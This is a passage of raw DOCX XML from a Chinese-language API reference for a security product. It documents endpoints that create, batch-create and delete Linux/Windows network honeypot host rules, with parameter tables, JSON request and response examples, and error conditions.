            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BFD8D65" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7926487C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="65D780F9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E68A311" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F44AA6D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="184AFCFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD7D372" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="480591D3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="177BB204" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F6909F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BAFF948" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28FB33F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口，限制不能超过5个</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18B8389A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E602377" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentId": "979f3c4d44b2e765",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ports": [8060,10020]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793D7CEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE4AC4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB723BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E2B7AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EACE2D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>帐号没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6986B255" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>主机规则已经存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74667B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则端口为空，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C6355" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则端口个数大于5个，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CBAE63"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497C54" w14:paraId="0A1B471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BEDE521" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007C02AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307F589A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2076D6CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="09879341" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5381DEB5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38499631" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A139C15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D57BA01" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3128E4C1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="批量创建规则"/>
      <w:bookmarkEnd w:id="169"/>
      <w:r>
        <w:t>批量创建规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DC862D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐批量创建主机规则功能</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F141975" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11215E52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/detect/honeypot/{linux,win}/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C27D6"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802"/>
        <w:gridCol w:w="1159"/>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="6162"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="14B487B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101117C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0108AC99" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D2284C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D60C6B9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="617E5391" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC74F85" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35428B91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F10308" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D0E1D14" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>范围，0:全部主机 1:自定义，包括业务组和主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1B43E827" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4658D092" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58464449" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AB676CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64F80E27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28B7B5B9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="172DEEEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5833838A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B4A1AA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74EC4FA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机列表，如果realmType=1, 则agentIds和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="492738A9" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC332C8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>excludeGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D7FDB74" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D12BED7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="633025CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排除业务组列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2B6AA7AB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00B589A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>excludeAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F6EB8D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65B5DC88" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDA3D34" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>排除主机列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="237EFAA8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AF124E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="185E033E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AF313F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="010121EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口列表（端口个数不能超过5个）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5962C10B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C94A950" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/honeypot/linux/rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3029D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C21DC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC7099" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04785E40" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围参数不合法，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C4675D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>范围为自定义范围时，业务组和主机同时为空，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE1168" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口为空，或端口数量大于5，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AEAC95"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497C54" w14:paraId="012F634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F1F95E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C6036E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C7E3DE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6219571A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3246019D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="120064AD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3422F812" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C93AADC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="080E93BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42B8C2F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="删除单条规则"/>
      <w:bookmarkEnd w:id="170"/>
      <w:r>
        <w:t>删除单条规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451C8341" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐删除主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E42250" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58053EC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/api/detect/honeypot/{linux,win}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45A7AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5858C54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73E0304" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21069DA0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
